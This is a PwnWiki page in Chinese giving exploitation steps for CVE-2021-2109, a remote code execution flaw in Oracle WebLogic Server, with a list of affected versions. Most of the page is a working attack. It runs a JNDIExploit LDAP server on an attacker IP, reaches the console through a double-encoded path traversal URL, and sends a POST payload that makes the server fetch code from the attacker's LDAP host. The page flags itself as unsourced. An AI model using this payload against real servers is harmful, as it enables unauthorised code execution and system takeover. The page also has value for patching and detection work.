CVE-2021-2109 Weblogic Server遠程代碼執行漏洞

From PwnWiki
Revision as of 14:32, 2 March 2021 by Pwnwiki (talk | contribs) (建立內容為「 {| style="margin: auto; width: 750px;" | style="text-align: left; margin: 1em 1em 1em 0; border: 1px solid #20A3C0; padding: .2em;" | {| cellspacing="2px" | val…」的新頁面)
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)
Book.png 這個頁面的內容缺少參考,無法保證內容的準確性。



影響版本

Weblogic Server 10.3.6.0.0

Weblogic Server 12.1.3.0.0

Weblogic Server 12.2.1.3.0

Weblogic Server 12.2.1.4.0

Weblogic Server 14.1.1.0.0


漏洞利用

下載LDAP (LDAP需要Java1.8環境)。

java -jar JNDIExploit-v1.11.jar -i 192.168.1.123

首頁URL後加入

/console/css/%252e%252e%252f/consolejndi.portal

在Burp中,将get修改爲post,並且構造數據包。

注:192.168.1;123 有個點修改爲分號。

_pageLabel=JNDIBindingPageGeneral&_nfpb=true&JNDIBindingPortlethandle=com.bea.console.handles.JndiBindingHandle(%22ldap://192.168.1;123:1389/Basic/WeblogicEcho;AdminServer%22)